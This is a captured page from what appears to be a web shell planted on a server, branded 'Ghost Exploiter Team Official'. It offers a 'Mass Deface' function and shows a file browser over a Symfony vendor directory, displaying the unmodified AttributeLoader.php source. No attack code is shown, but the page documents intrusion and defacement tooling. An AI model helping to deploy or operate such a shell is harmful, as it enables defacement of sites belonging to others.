Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
symfony
/
serializer
/
Mapping
/
Loader
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
schema
--
ren
AccessorCollisionResolv
...
3.29KB
edt
ren
AttributeLoader.php
11.318KB
edt
ren
FileLoader.php
1.012KB
edt
ren
LoaderChain.php
1.852KB
edt
ren
LoaderInterface.php
0.559KB
edt
ren
XmlFileLoader.php
6.317KB
edt
ren
YamlFileLoader.php
7.014KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Serializer\Mapping\Loader; use Symfony\Component\Serializer\Attribute\Context; use Symfony\Component\Serializer\Attribute\DiscriminatorMap; use Symfony\Component\Serializer\Attribute\Groups; use Symfony\Component\Serializer\Attribute\Ignore; use Symfony\Component\Serializer\Attribute\MaxDepth; use Symfony\Component\Serializer\Attribute\SerializedName; use Symfony\Component\Serializer\Attribute\SerializedPath; use Symfony\Component\Serializer\Exception\MappingException; use Symfony\Component\Serializer\Mapping\AttributeMetadata; use Symfony\Component\Serializer\Mapping\AttributeMetadataInterface; use Symfony\Component\Serializer\Mapping\ClassDiscriminatorMapping; use Symfony\Component\Serializer\Mapping\ClassMetadataInterface; /** * Loader for PHP attributes. * * @author Kévin Dunglas <dunglas@gmail.com> * @author Alexander M. Turek <me@derrabus.de> * @author Alexandre Daubois <alex.daubois@gmail.com> */ class AttributeLoader implements LoaderInterface { use AccessorCollisionResolverTrait; private const KNOWN_ATTRIBUTES = [ DiscriminatorMap::class, Groups::class, Ignore::class, MaxDepth::class, SerializedName::class, SerializedPath::class, Context::class, ]; /** * @param bool|null $allowAnyClass Null is allowed for BC with Symfony <= 6 * @param array<class-string, class-string[]> $mappedClasses */ public function __construct( private ?bool $allowAnyClass = true, private array $mappedClasses = [], ) { $this->allowAnyClass ??= true; } /** * @return class-string[] */ public function getMappedClasses(): array { return array_keys($this->mappedClasses); } public function loadClassMetadata(ClassMetadataInterface $classMetadata): bool { if (!$sourceClasses = $this->mappedClasses[$classMetadata->getName()] ??= $this->allowAnyClass ? [$classMetadata->getName()] : []) { return false; } $success = false; foreach ($sourceClasses as $sourceClass) { $reflectionClass = $classMetadata->getName() === $sourceClass ? $classMetadata->getReflectionClass() : new \ReflectionClass($sourceClass); $success = $this->doLoadClassMetadata($reflectionClass, $classMetadata) || $success; } return $success; } private function doLoadClassMetadata(\ReflectionClass $reflectionClass, ClassMetadataInterface $classMetadata): bool { $className = $reflectionClass->name; $loaded = false; $classGroups = []; $classContextAttribute = null; $attributesMetadata = $classMetadata->getAttributesMetadata(); foreach ($this->loadAttributes($reflectionClass) as $attribute) { match (true) { $attribute instanceof DiscriminatorMap => $classMetadata->setClassDiscriminatorMapping(new ClassDiscriminatorMapping($attribute->typeProperty, $attribute->mapping, $attribute->defaultType)), $attribute instanceof Groups => $classGroups = $attribute->groups, $attribute instanceof Context => $classContextAttribute = $attribute, default => null, }; } foreach ($reflectionClass->getProperties() as $property) { if (!isset($attributesMetadata[$property->name])) { $attributesMetadata[$property->name] = new AttributeMetadata($property->name); $classMetadata->addAttributeMetadata($attributesMetadata[$property->name]); } $attributeMetadata = $attributesMetadata[$property->name]; if ($property->getDeclaringClass()->name === $className) { if ($classContextAttribute) { $this->setAttributeContextsForGroups($classContextAttribute, $attributeMetadata); } foreach ($classGroups as $group) { $attributeMetadata->addGroup($group); } foreach ($this->loadAttributes($property) as $attribute) { $loaded = true; if ($attribute instanceof Groups) { foreach ($attribute->groups as $group) { $attributeMetadata->addGroup($group); } continue; } match (true) { $attribute instanceof MaxDepth => $attributeMetadata->setMaxDepth($attribute->maxDepth), $attribute instanceof SerializedName => $attributeMetadata->setSerializedName($attribute->serializedName), $attribute instanceof SerializedPath => $attributeMetadata->setSerializedPath($attribute->serializedPath), $attribute instanceof Ignore => $attributeMetadata->setIgnore(true), $attribute instanceof Context => $this->setAttributeContextsForGroups($attribute, $attributeMetadata), default => null, }; } } } foreach ($reflectionClass->getMethods() as $method) { if ($method->getDeclaringClass()->name !== $className) { continue; } $name = $method->name; if (0 === stripos($name, 'get') && $method->getNumberOfRequiredParameters()) { continue; /* matches the BC behavior in `Symfony\Component\Serializer\Normalizer\ObjectNormalizer::extractAttributes` */ } $attributeName = $this->getAttributeNameFromAccessor($reflectionClass, $method, true); $accessorOrMutator = null !== $attributeName; $hasProperty = $this->hasPropertyForAccessor($method->getDeclaringClass(), $name); if ($hasProperty || $accessorOrMutator) { if (null === $attributeName || 's' !== $name[0] && $hasProperty && $this->hasAttributeNameCollision($reflectionClass, $attributeName, $name)) { $attributeName = $name; } if (isset($attributesMetadata[$attributeName])) { $attributeMetadata = $attributesMetadata[$attributeName]; } else { $attributesMetadata[$attributeName] = $attributeMetadata = new AttributeMetadata($attributeName); $classMetadata->addAttributeMetadata($attributeMetadata); } } foreach ($this->loadAttributes($method) as $attribute) { if ($attribute instanceof Groups) { if (!$accessorOrMutator && !$hasProperty) { throw new MappingException(\sprintf('Groups on "%s::%s()" cannot be added. Groups can only be added on methods beginning with "get", "is", "has", "can" or "set".', $className, $method->name)); } foreach ($attribute->groups as $group) { $attributeMetadata->addGroup($group); } } elseif ($attribute instanceof MaxDepth) { if (!$accessorOrMutator && !$hasProperty) { throw new MappingException(\sprintf('MaxDepth on "%s::%s()" cannot be added. MaxDepth can only be added on methods beginning with "get", "is", "has", "can" or "set".', $className, $method->name)); } $attributeMetadata->setMaxDepth($attribute->maxDepth); } elseif ($attribute instanceof SerializedName) { if (!$accessorOrMutator && !$hasProperty) { throw new MappingException(\sprintf('SerializedName on "%s::%s()" cannot be added. SerializedName can only be added on methods beginning with "get", "is", "has", "can" or "set".', $className, $method->name)); } $attributeMetadata->setSerializedName($attribute->serializedName); } elseif ($attribute instanceof SerializedPath) { if (!$accessorOrMutator && !$hasProperty) { throw new MappingException(\sprintf('SerializedPath on "%s::%s()" cannot be added. SerializedPath can only be added on methods beginning with "get", "is", "has", "can" or "set".', $className, $method->name)); } $attributeMetadata->setSerializedPath($attribute->serializedPath); } elseif ($attribute instanceof Ignore) { $attributeMetadata->setIgnore(true); } elseif ($attribute instanceof Context) { if (!$accessorOrMutator && !$hasProperty) { throw new MappingException(\sprintf('Context on "%s::%s()" cannot be added. Context can only be added on methods beginning with "get", "is", "has", "can" or "set".', $className, $method->name)); } $this->setAttributeContextsForGroups($attribute, $attributeMetadata); } $loaded = true; } } return $loaded; } private function loadAttributes(\ReflectionMethod|\ReflectionClass|\ReflectionProperty $reflector): iterable { foreach ($reflector->getAttributes() as $attribute) { if ($this->isKnownAttribute($attribute->getName())) { try { yield $attribute->newInstance(); } catch (\Error $e) { if (\Error::class !== $e::class) { throw $e; } $on = match (true) { $reflector instanceof \ReflectionClass => ' on class '.$reflector->name, $reflector instanceof \ReflectionMethod => \sprintf(' on "%s::%s()"', $reflector->getDeclaringClass()->name, $reflector->name), $reflector instanceof \ReflectionProperty => \sprintf(' on "%s::$%s"', $reflector->getDeclaringClass()->name, $reflector->name), default => '', }; throw new MappingException(\sprintf('Could not instantiate attribute "%s"%s.', $attribute->getName(), $on), 0, $e); } } } } private function setAttributeContextsForGroups(Context $attribute, AttributeMetadataInterface $attributeMetadata): void { $context = $attribute->context; $groups = $attribute->groups; $normalizationContext = $attribute->normalizationContext; $denormalizationContext = $attribute->denormalizationContext; if ($normalizationContext || $context) { $attributeMetadata->setNormalizationContextForGroups($normalizationContext ?: $context, $groups); } if ($denormalizationContext || $context) { $attributeMetadata->setDenormalizationContextForGroups($denormalizationContext ?: $context, $groups); } } private function isKnownAttribute(string $attributeName): bool { foreach (self::KNOWN_ATTRIBUTES as $knownAttribute) { if (is_a($attributeName, $knownAttribute, true)) { return true; } } return false; } }
<=Back
Liking